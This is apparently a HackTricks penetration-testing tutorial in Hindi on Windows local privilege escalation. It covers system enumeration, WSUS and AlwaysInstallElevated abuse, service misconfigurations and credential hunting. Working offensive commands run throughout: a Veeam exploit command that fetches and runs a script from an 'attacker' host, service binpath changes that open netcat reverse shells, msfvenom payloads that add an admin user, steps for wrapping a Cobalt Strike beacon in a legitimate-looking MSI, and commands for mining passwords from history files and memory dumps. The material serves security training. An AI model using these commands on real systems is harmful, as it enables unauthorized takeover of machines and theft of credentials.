Windows Local Privilege Escalation

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

Windows local privilege escalation vectors को खोजने के लिए सबसे अच्छा टूल: WinPEAS

प्रारंभिक Windows सिद्धांत

Access Tokens

यदि आप नहीं जानते कि Windows Access Tokens क्या हैं, तो जारी रखने से पहले निम्न पृष्ठ पढ़ें:

Access Tokens

ACLs - DACLs/SACLs/ACEs

ACLs - DACLs/SACLs/ACEs के बारे में अधिक जानकारी के लिए निम्न पृष्ठ देखें:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

यदि आप नहीं जानते कि Windows में integrity levels क्या हैं, तो जारी रखने से पहले निम्न पृष्ठ पढ़ें:

Integrity Levels

Windows Security Controls

Windows में कई ऐसी चीज़ें होती हैं जो आपको सिस्टम की enumeration करने से रोक सकती हैं, executables चलाने से रोक सकती हैं, या यहाँ तक कि आपकी गतिविधियों को detect भी कर सकती हैं। आपको privilege escalation enumeration शुरू करने से पहले निम्न पृष्ठ पढ़ना और इन सभी defenses mechanisms को enumerate करना चाहिए:

Windows Security Controls

Admin Protection / UIAccess silent elevation

RAiLaunchAdminProcess के माध्यम से लॉन्च किए गए UIAccess processes का दुरुपयोग करके, जब AppInfo secure-path checks बाईपास होते हैं, तो बिना prompts के High IL तक पहुँचा जा सकता है। समर्पित UIAccess/Admin Protection bypass workflow यहाँ देखें:

Uiaccess Admin Protection Bypass

System Info

Version info enumeration

जाँचें कि क्या Windows version में कोई ज्ञात vulnerability है (लागू किए गए patches भी जाँचें)।

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

संस्करण Exploits

यह site Microsoft सुरक्षा कमजोरियों के बारे में विस्तृत जानकारी खोजने के लिए उपयोगी है। इस डेटाबेस में 4,700 से अधिक सुरक्षा कमजोरियाँ हैं, जो दिखाती हैं कि एक Windows environment कितना massive attack surface प्रस्तुत करता है।

सिस्टम पर

• post/windows/gather/enum_patches
• post/multi/recon/local_exploit_suggester
• watson
• winpeas (Winpeas में watson embedded)

स्थानीय रूप से सिस्टम जानकारी के साथ

• https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• https://github.com/bitsadmin/wesng

exploits के Github repos:

• https://github.com/nomi-sec/PoC-in-GitHub
• https://github.com/abatchy17/WindowsExploits
• https://github.com/SecWiki/windows-kernel-exploits

Environment

क्या कोई credential/Juicy info env variables में सेव है?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

PowerShell इतिहास

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell ट्रांसक्रिप्ट फ़ाइलें

आप इसे कैसे चालू करें यह जानने के लिए देखें: https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

PowerShell पाइपलाइन निष्पादनों का विवरण रिकॉर्ड किया जाता है, जिसमें निष्पादित कमांड, कमांड इनवोकेशन्स, और स्क्रिप्ट के हिस्से शामिल होते हैं। हालांकि, पूरा निष्पादन विवरण और आउटपुट परिणाम हमेशा कैप्चर नहीं होते।

इसे सक्षम करने के लिए, दस्तावेज़ के “Transcript files” सेक्शन में दिए निर्देशों का पालन करें, और “Module Logging” को “Powershell Transcription” के बजाय चुनें।

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

PowersShell logs से अंतिम 15 events देखने के लिए आप निम्नलिखित चला सकते हैं:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

स्क्रिप्ट के निष्पादन की संपूर्ण गतिविधि और पूर्ण सामग्री रिकॉर्ड कैप्चर की जाती है, जिससे यह सुनिश्चित होता है कि कोड का हर ब्लॉक चलते समय दस्तावेज़ हो। यह प्रक्रिया प्रत्येक गतिविधि का एक व्यापक ऑडिट ट्रेल संरक्षित करती है, जो फॉरेंसिक जांच और दुर्भावनापूर्ण व्यवहार के विश्लेषण के लिए मूल्यवान है। निष्पादन के समय सभी गतिविधियों का दस्तावेजीकरण करके प्रक्रिया के बारे में विस्तृत जानकारी प्रदान की जाती है।

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Script Block के लिए लॉगिंग इवेंट्स Windows Event Viewer में इस पथ पर स्थित हैं: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
पिछले 20 इवेंट्स देखने के लिए आप उपयोग कर सकते हैं:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

इंटरनेट सेटिंग्स

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

ड्राइव्स

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

आप सिस्टम को compromise कर सकते हैं अगर updates httpS के बजाय http के माध्यम से अनुरोध किए जा रहे हैं।

आप यह जाँच करके शुरू करते हैं कि नेटवर्क non-SSL WSUS update का उपयोग कर रहा है या नहीं, cmd में निम्नलिखित चलाकर:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

या PowerShell में निम्नलिखित:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

यदि आपको इनमें से किसी तरह का उत्तर मिलता है:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

और अगर HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer या Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" का मान 1 है।

तो, it is exploitable. अगर अंतिम registry का मान 0 है, तो WSUS एंट्री को अनदेखा कर दिया जाएगा।

इन कमजोरियों का फायदा उठाने के लिए आप tools जैसे: Wsuxploit, pyWSUS का उपयोग कर सकते हैं - ये MiTM weaponized exploits scripts हैं जो non-SSL WSUS ट्रैफ़िक में ‘fake’ अपडेट्स इंजेक्ट करते हैं।

Read the research here:

WSUS CVE-2020-1013

Read the complete report here.
मूल रूप से, यह वह दोष है जिसका यह बग फायदा उठाता है:

यदि हमारे पास अपने local user proxy को संशोधित करने की क्षमता है, और Windows Updates Internet Explorer की settings में कॉन्फ़िगर किए गए proxy का उपयोग करता है, तो हम लोकली PyWSUS चला कर अपनी ही ट्रैफ़िक को इंटरसेप्ट कर सकते हैं और अपने asset पर elevated user के रूप में कोड चला सकते हैं।

इसके अलावा, चूंकि WSUS सेवा current user की settings का उपयोग करती है, यह उसके certificate store का भी उपयोग करेगा। यदि हम WSUS hostname के लिए एक self-signed certificate जनरेट करते हैं और उस certificate को current user के certificate store में जोड़ते हैं, तो हम HTTP और HTTPS दोनों WSUS ट्रैफ़िक को इंटरसेप्ट करने में सक्षम होंगे। WSUS certificate पर trust-on-first-use प्रकार की वैलिडेशन लागू करने के लिए किसी HSTS-like mechanism का उपयोग नहीं करता। यदि प्रस्तुत किया गया certificate user द्वारा trusted है और hostname सही है, तो सेवा इसे स्वीकार कर लेगी।

You can exploit this vulnerability using the tool WSUSpicious (once it’s liberated).

Third-Party Auto-Updaters and Agent IPC (local privesc)

कई enterprise agents एक localhost IPC surface और एक privileged update channel एक्सपोज़ करते हैं। यदि enrollment को attacker server की ओर मजबूर किया जा सके और updater किसी rogue root CA या weak signer checks को ट्रस्ट करता हो, तो एक local user एक malicious MSI दे सकता है जिसे SYSTEM सेवा इंस्टॉल कर देती है। यहाँ एक generalized technique देखें (Netskope stAgentSvc chain – CVE-2025-0309 पर आधारित):

Abusing Auto Updaters And Ipc

Veeam Backup & Replication CVE-2023-27532 (SYSTEM via TCP 9401)

Veeam B&R < 11.0.1.1261 एक localhost सेवा TCP/9401 पर एक्सपोज़ करता है जो attacker-controlled messages प्रोसेस करती है, जिससे arbitrary commands NT AUTHORITY\SYSTEM के रूप में चलने की अनुमति मिलती है।

• Recon: listener और version को कन्फर्म करें, उदाहरण के लिए, netstat -ano | findstr 9401 और (Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe").VersionInfo.FileVersion।
• Exploit: उसी डायरेक्टरी में आवश्यक Veeam DLLs के साथ VeeamHax.exe जैसा एक PoC रखें, फिर local socket पर SYSTEM payload ट्रिगर करें:

.\VeeamHax.exe --cmd "powershell -ep bypass -c \"iex(iwr http://attacker/shell.ps1 -usebasicparsing)\""

The service executes the command as SYSTEM.

KrbRelayUp

Windows domain वातावरणों में कुछ विशिष्ट परिस्थितियों के अंतर्गत एक local privilege escalation vulnerability मौजूद है। इन परिस्थितियों में ऐसे वातावरण शामिल हैं जहाँ LDAP signing is not enforced, उपयोगकर्ताओं के पास self-rights होते हैं जो उन्हें Resource-Based Constrained Delegation (RBCD) कॉन्फ़िगर करने की अनुमति देते हैं, और उपयोगकर्ता domain के भीतर कंप्यूटर बनाने में सक्षम होते हैं। यह ध्यान देने योग्य है कि ये requirements default settings का उपयोग करने पर पूरी होती हैं।

इस exploit in https://github.com/Dec0ne/KrbRelayUp को देखें

हमले के फ्लो के बारे में अधिक जानकारी के लिए देखें https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If ये 2 रजिस्ट्री प्रविष्टियाँ enabled (value is 0x1) हैं, तो किसी भी privilege के उपयोगकर्ता *.msi फाइलें NT AUTHORITY\SYSTEM के रूप में install (execute) कर सकते हैं।

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

यदि आपके पास एक meterpreter session है, तो आप इस तकनीक को module exploit/windows/local/always_install_elevated का उपयोग करके स्वचालित कर सकते हैं।

PowerUP

power-up से Write-UserAddMSI कमांड का उपयोग करके वर्तमान निर्देशिका में privileges बढ़ाने के लिए एक Windows MSI binary बनाएं। यह स्क्रिप्ट एक precompiled MSI installer लिखती है जो user/group जोड़ने के लिए prompt करता है (इसलिए आपको GIU access की आवश्यकता होगी):

Write-UserAddMSI

सिर्फ बनाए गए binary को execute करके privileges escalate करें।

MSI Wrapper

Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a “.bat” file if you just want to execute command lines

MSI Wrapper

Create MSI with WIX

Create MSI with WIX

Create MSI with Visual Studio

• Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
• Visual Studio खोलें, Create a new project चुनें और search बॉक्स में “installer” टाइप करें। Setup Wizard प्रोजेक्ट चुनें और Next पर क्लिक करें।
• प्रोजेक्ट का नाम दें, जैसे AlwaysPrivesc, location के लिए C:\privesc चुनें, place solution and project in the same directory चुनें, और Create पर क्लिक करें।
• जब तक आप step 3 of 4 (choose files to include) तक नहीं पहुँचते तब तक Next पर क्लिक करते रहें। Add पर क्लिक करें और अभी जो Beacon payload आपने जनरेट किया था उसे चुनें। फिर Finish पर क्लिक करें।
• Solution Explorer में AlwaysPrivesc प्रोजेक्ट को हाईलाइट करें और Properties में TargetPlatform को x86 से x64 बदलें।
• और भी properties हैं जिन्हें आप बदल सकते हैं, जैसे Author और Manufacturer जो installed app को अधिक legitimate दिखा सकते हैं।
• प्रोजेक्ट पर राइट-क्लिक करें और View > Custom Actions चुनें।
• Install पर राइट-क्लिक करें और Add Custom Action चुनें।
• Application Folder पर डबल-क्लिक करें, अपनी beacon.exe फ़ाइल चुनें और OK पर क्लिक करें। इससे installer चलते ही beacon payload execute होगा।
• Custom Action Properties के तहत Run64Bit को True पर बदलें।
• अंत में, build it।
• यदि warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' दिखाई दे, तो सुनिश्चित करें कि आपने platform को x64 पर सेट किया है।

MSI Installation

To execute the installation of the malicious .msi file in background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

इस vulnerability को exploit करने के लिए आप उपयोग कर सकते हैं: exploit/windows/local/always_install_elevated

एंटीवायरस और डिटेक्टर

ऑडिट सेटिंग्स

ये सेटिंग्स तय करती हैं कि क्या लॉग किया जा रहा है, इसलिए आपको ध्यान देना चाहिए।

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, यह जानना उपयोगी है कि logs कहाँ भेजे जाते हैं

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS को डोमेन से जुड़े कंप्यूटरों पर local Administrator पासवर्ड्स के प्रबंधन के लिए डिज़ाइन किया गया है, यह सुनिश्चित करते हुए कि प्रत्येक पासवर्ड अद्वितीय, यादृच्छिक और नियमित रूप से अपडेट किया जाता है। ये पासवर्ड Active Directory में सुरक्षित रूप से संग्रहित होते हैं और केवल उन उपयोगकर्ताओं द्वारा एक्सेस किए जा सकते हैं जिन्हें ACLs के माध्यम से पर्याप्त अनुमतियाँ दी गई हों, जिससे वे अधिकृत होने पर local admin passwords देख सकें।

LAPS

WDigest

यदि सक्रिय है, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
इस पृष्ठ पर WDigest के बारे में अधिक जानकारी

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Windows 8.1 से शुरू होकर, Microsoft ने Local Security Authority (LSA) के लिए बेहतर सुरक्षा पेश की ताकि अनविश्वसनीय प्रक्रियाओं द्वारा इसके read its memory या inject code के प्रयासों को block किया जा सके, और इस प्रकार सिस्टम और अधिक सुरक्षित हो।
More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard को Windows 10 में पेश किया गया था। इसका उद्देश्य डिवाइस पर संग्रहीत credentials को pass-the-hash attacks जैसे खतरों से सुरक्षित रखना है.| Credentials Guard के बारे में अधिक जानकारी यहाँ.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials को Local Security Authority (LSA) द्वारा प्रमाणीकृत किया जाता है और ऑपरेटिंग सिस्टम के घटकों द्वारा उपयोग किया जाता है। जब किसी उपयोगकर्ता का लॉगऑन डेटा किसी registered security package द्वारा प्रमाणीकृत होता है, तो आम तौर पर उस उपयोगकर्ता के लिए domain credentials स्थापित हो जाते हैं।
More info about Cached Credentials here.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

उपयोगकर्ता और समूह

उपयोगकर्ताओं और समूहों को सूचीबद्ध करें

आपको यह जांचना चाहिए कि जिन समूहों में आप शामिल हैं उनमें से किसी के पास दिलचस्प permissions हैं या नहीं।

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

विशेषाधिकार समूह

यदि आप किसी विशेषाधिकार समूह के सदस्य हैं तो आप विशेषाधिकार बढ़ा (escalate) सकते हैं। विशेषाधिकार समूहों और उन्हें दुरुपयोग करके विशेषाधिकार बढ़ाने के तरीकों के बारे में यहाँ जानें:

Privileged Groups

Token हेरफेर

और अधिक जानें कि token क्या है इस पेज पर: Windows Tokens.
निम्नलिखित पृष्ठ देखें ताकि आप interesting tokens के बारे में जानें और उन्हें कैसे दुरुपयोग किया जाए:

Abusing Tokens

लॉग्ड उपयोगकर्ता / सत्र

qwinsta
klist sessions

होम फ़ोल्डर्स

dir C:\Users
Get-ChildItem C:\Users

पासवर्ड नीति

net accounts

क्लिपबोर्ड की सामग्री प्राप्त करें

powershell -command "Get-Clipboard"

चल रही प्रक्रियाएँ

फ़ाइल और फ़ोल्डर अनुमतियाँ

सबसे पहले, processes की सूची बनाते समय process की command line में passwords की जांच करें.
जाँचें कि क्या आप किसी चल रहे binary को overwrite कर सकते हैं या बाइनरी फ़ोल्डर पर write permissions हैं ताकि संभावित DLL Hijacking attacks का फायदा उठाया जा सके:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

हमेशा संभव electron/cef/chromium debuggers running, you could abuse it to escalate privileges की जाँच करें।

प्रोसेस बाइनरीज़ की अनुमतियों की जाँच

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

प्रोसेस बाइनरीज़ के फ़ोल्डरों की अनुमति की जाँच (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

आप sysinternals के procdump का उपयोग करके किसी चल रहे process का memory dump बना सकते हैं। FTP जैसे services में credentials in clear text in memory होते हैं, memory को dump करके उन credentials को पढ़ने की कोशिश करें।

procdump.exe -accepteula -ma <proc_name_tasklist>

असुरक्षित GUI ऐप्स

SYSTEM के रूप में चलने वाले Applications उपयोगकर्ता को CMD लॉन्च करने या डायरेक्टरी ब्राउज़ करने की अनुमति दे सकते हैं।

उदाहरण: “Windows Help and Support” (Windows + F1), “command prompt” खोजें, “Click to open Command Prompt” पर क्लिक करें

Services

Service Triggers Windows को कुछ शर्तें होने पर एक service शुरू करने देते हैं (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, आदि)। SERVICE_START rights के बिना भी आप अक्सर privileged services को उनके triggers को सक्रिय करके शुरू कर सकते हैं। enumeration और activation techniques यहाँ देखें:

Service Triggers

सेवाओं की सूची प्राप्त करें:

net start
wmic service list brief
sc query
Get-Service

अनुमतियाँ

आप किसी सेवा की जानकारी प्राप्त करने के लिए sc का उपयोग कर सकते हैं।

sc qc <service_name>

प्रत्येक सेवा के लिए आवश्यक privilege level की जाँच करने हेतु Sysinternals का binary accesschk होना अनुशंसित है।

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

अनुशंसित है कि जाँचें कि क्या “Authenticated Users” किसी सेवा को संशोधित कर सकते हैं:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

सेवा सक्षम करें

यदि आपको यह त्रुटि मिल रही है (उदाहरण के लिए SSDPSRV के साथ):

सिस्टम त्रुटि 1058 हुई है.
सेवा शुरू नहीं की जा सकती है, या तो क्योंकि यह अक्षम है या क्योंकि इसके साथ कोई सक्रिय डिवाइस संबद्ध नहीं है.

आप इसे निम्न का उपयोग करके सक्षम कर सकते हैं

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

ध्यान में रखें कि सेवा upnphost काम करने के लिए SSDPSRV पर निर्भर है (for XP SP1)

Another workaround इस समस्या के लिए चलाने का तरीका है:

sc.exe config usosvc start= auto

Modify service binary path

ऐसे परिदृश्य में जहाँ “Authenticated users” समूह के पास किसी सेवा पर SERVICE_ALL_ACCESS है, सेवा की निष्पादन योग्य बाइनरी को संशोधित करना संभव है। सेवा को संशोधित और चलाने के लिए sc का उपयोग करें:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

सेवा पुनरारंभ करें

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

अधिकार विभिन्न अनुमतियों के माध्यम से बढ़ाए जा सकते हैं:

• SERVICE_CHANGE_CONFIG: सेवा बाइनरी को पुनः कॉन्फ़िगर करने की अनुमति देता है।
• WRITE_DAC: अनुमति पुनः कॉन्फ़िगरेशन सक्षम करता है, जिससे सेवा कॉन्फ़िगरेशन बदलने की क्षमता मिलती है।
• WRITE_OWNER: मालिकाना प्राप्त करने और अनुमति पुनः कॉन्फ़िगरेशन करने की अनुमति देता है।
• GENERIC_WRITE: सेवा कॉन्फ़िगरेशन बदलने की क्षमता देता है।
• GENERIC_ALL: सेवा कॉन्फ़िगरेशन बदलने की क्षमता भी देता है।

इस vulnerability के पता लगाने और exploit करने के लिए, exploit/windows/local/service_permissions का उपयोग किया जा सकता है।

Services binaries weak permissions

जाँच करें कि क्या आप उस बाइनरी को संशोधित कर सकते हैं जिसे कोई service execute करता है या क्या आपके पास उस फ़ोल्डर पर write permissions हैं जहाँ बाइनरी स्थित है (DLL Hijacking).
आप किसी service द्वारा execute किए जाने वाले हर बाइनरी को wmic (not in system32) का उपयोग करके प्राप्त कर सकते हैं और अपनी permissions की जाँच icacls का उपयोग करके कर सकते हैं:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

आप sc और icacls का भी उपयोग कर सकते हैं:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Services registry modify permissions

आपको यह जाँचना चाहिए कि क्या आप किसी service registry को संशोधित कर सकते हैं।
आप check कर सकते हैं अपनी permissions किसी service registry पर, इस तरह:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

यह सत्यापित किया जाना चाहिए कि क्या Authenticated Users या NT AUTHORITY\INTERACTIVE के पास FullControl अनुमतियाँ हैं। यदि हाँ, तो सर्विस द्वारा चलाए जाने वाले binary को बदला जा सकता है।

चलाए जाने वाले binary के Path को बदलने के लिए:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory अनुमतियाँ

यदि आपके पास किसी registry पर यह अनुमति है, तो इसका मतलब है कि आप इस registry से sub-registries बना सकते हैं। Windows services के मामले में यह मनमाना कोड निष्पादित करने के लिए पर्याप्त है:

AppendData/AddSubdirectory permission over service registry

बिना उद्धरण वाले Service Paths

यदि किसी executable का path उद्धरण चिह्नों (quotes) में नहीं है, तो Windows space से पहले के हर हिस्से को निष्पादित करने की कोशिश करेगा।

उदाहरण के लिए, path C:\Program Files\Some Folder\Service.exe के लिए Windows निम्नलिखित को निष्पादित करने की कोशिश करेगा:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

बिल्ट-इन Windows सेवाओं से संबंधित उन सेवाओं को छोड़कर, सभी unquoted service paths सूचीबद्ध करें:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32" | findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:"\""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

आप इस vulnerability का पता लगा सकते हैं और metasploit के साथ exploit कर सकते हैं: exploit/windows/local/trusted\_service\_path आप मैनुअली metasploit के साथ एक service binary बना सकते हैं:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

रिकवरी क्रियाएँ

Windows उपयोगकर्ताओं को यह निर्दिष्ट करने की अनुमति देता है कि यदि कोई सेवा विफल हो तो कौन‑सी कार्रवाई की जाए। इस फीचर को किसी binary की ओर पॉइंट करने के लिए configure किया जा सकता है। यदि यह binary replaceable है, तो privilege escalation संभव हो सकता है। अधिक जानकारी official documentation में मिल सकती है।

एप्लिकेशन

इंस्टॉल किए गए एप्लिकेशन

जाँच करें permissions of the binaries (शायद आप किसी को overwrite करके privilege escalation कर सकें) और folders के भी। (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

लिखने की अनुमतियाँ

पता करें कि क्या आप किसी config फ़ाइल को संशोधित कर सकते हैं ताकि किसी विशेष फ़ाइल को पढ़ा जा सके, या क्या आप किसी binary को संशोधित कर सकते हैं जिसे Administrator खाते द्वारा (schedtasks) निष्पादित किया जाएगा।

सिस्टम में कमजोर फ़ोल्डर/फ़ाइल अनुमतियाँ खोजने का एक तरीका है:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
